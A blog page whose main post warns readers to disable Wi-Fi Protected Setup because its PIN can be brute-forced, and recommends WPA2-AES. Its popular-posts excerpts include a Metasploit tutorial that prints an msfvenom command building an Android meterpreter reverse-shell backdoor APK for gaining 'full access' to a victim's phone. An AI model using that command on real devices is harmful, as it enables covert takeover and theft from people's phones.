Skip to main content

Why you should disable WPS!


What's WPS and what it does?

[Wi-Fi Protected Setup]
WPS is a wireless networking standard that tries to make connections between a router and wireless devices faster and easier. It works only for wireless networks that have WPA Personal(deprecated) or WPA2 Personal(recommended) security.

Nowadays, modern routers come with this new technology known as WPS or Wi-Fi Protected Setup. Although, WPS makes it easier and faster to connect your devices to your home network, it, somehow, contains some security flaws, that are well-documented on the internet.

Is WPS recommended?

NO!
Even though it's enabled by default, you should find a way to disable it because of the Brute Force Vulnerability. Many Wi-Fi access points that support WPS may be affected. Here are some links which may be useful in this context:
  • Article 1(HowToGeek)
  • Article 2(VU#723755)

  • Normally, you can't just connect your wireless devices to a wireless network anywhere, unless you know the SSID and the WPA-Key. You have to first of all choose the network you want to connect with, and enter its security key, but with WPS-enabled, it's not the case anymore.

    WPS was originally, invented by the Wi-Fi Alliance.

    How WPS can affect your network?

    An attacker withing required range of the wireless access point, may be able to brute force the WPS PIN and retrieve the password for the wireless network, changing the configuration of the access point, or cause a denial of service. [Reference]

    Solution

    Disable WPS!!!!


    You can do so by entering your ADSL Modem through its IP (usually 192.168.1.1), and disabling WPS on the interface displayed to you.

    Further security notes to take:
  • Ensure that you're using WPA2-AES instead of WPA2-TKIP or WPA-TKIP, because encryption type TKIP is no longer considered secure. AES(Advanced Encryption Standard) seems to be a more secure encryption Protocol.
  • Popular posts from this blog

    Learn how to make an auto login bot with Autoit

    Start by creating a new directory and make an autoit script. Edit the script and include IE.au3:
    #include 
    Suppose we're writing a script which will allow a anyone to sign in his facebook on a scheduled time automatically.
    It's simple, don't panic!
    You need to call a function with any name you want. Let's take loginfb()!
    call ("loginfb") So, we only have to write the function loginfb now!
    Func loginfb()
    Global $oIE = _IECreate ("https://www.facebook.com/")

    Local $username = _IEGetObjByName ($oIE, "email")
    Local $password = _IEgetObjByName ($oIE, "pass")
    Local $button = _IEGetObjById ($oIE, "loginbutton")

    _IEFormElementSetValue ($username, "") // your email here!
    _IEFormElementSetValue ($password, "") //your fb password here!
    Send("{Enter}")
    EndFunc
    $username and $password are variables. "email" and "pass" are the names given to the textarea where you are to write your emai…

    [Android + msf]How to use Metasploit Framework on an Android Device?

    Metasploit Framework(msf)
    Requirements:
    Linux-based OSYou'll need to have msfconsole installed on your machine
    You'll need to have msfvenom correctly installed on the machine. This will be used to generate the backdoor. Install apktool as well.Note: This tutorial is meant for educational purposes only. Please don't misguide the purpose of this tutorial, you'll be responsible for any act of Hacking or theft.
    Steps1) First of all open up your terminal. (Ctrl + Alt + T)
    $ sudo apt-get update Update your repositories before starting.

    2) Once updated, we can start. Simply follow the steps below to get started:
    $ sudo msfvenom -p android/meterpreter/reverse_tcp LHOST='xxx.xxx.x.x' LPORT='xxxx' R > testfile.apk Replace "testfile" with any name you want. This will be the Main Activity, which when tapped on your android device will activate meterpreter on your terminal and let you gain full access to the victims android phone.

    You can check out the archit…

    [Python]Publish your python project to PyPI

    The Python Package Index, also known as PyPI, is a large repository of python packages. Millions of developers all around the world contribute to Python daily by creating python scripts and uploading to PyPI.

    In this blog post, I am going to write a simple python script that, on running, will print Hello World on the terminal. Then, going to upload this script to PyPI so that it can be installed on any platform easily using pip or pip3.

    Requirements:
    1. Github account
    2. Basic knowledge of python
    3. setuptools - (pip3 install setuptools)
    4. wheel - (pip3 install wheel)

    By the end of this blog post, you should be able to print hello world using a single command:


    Let's get started! The first thing to do is find a unique name for your project. The name that I will call the Hello World script will be print_hello_world. At the time that I am writing this post, there is not package called print_hello_world on PyPI. Logically, after doing this tutorial, there might be one.

    1. Create app f…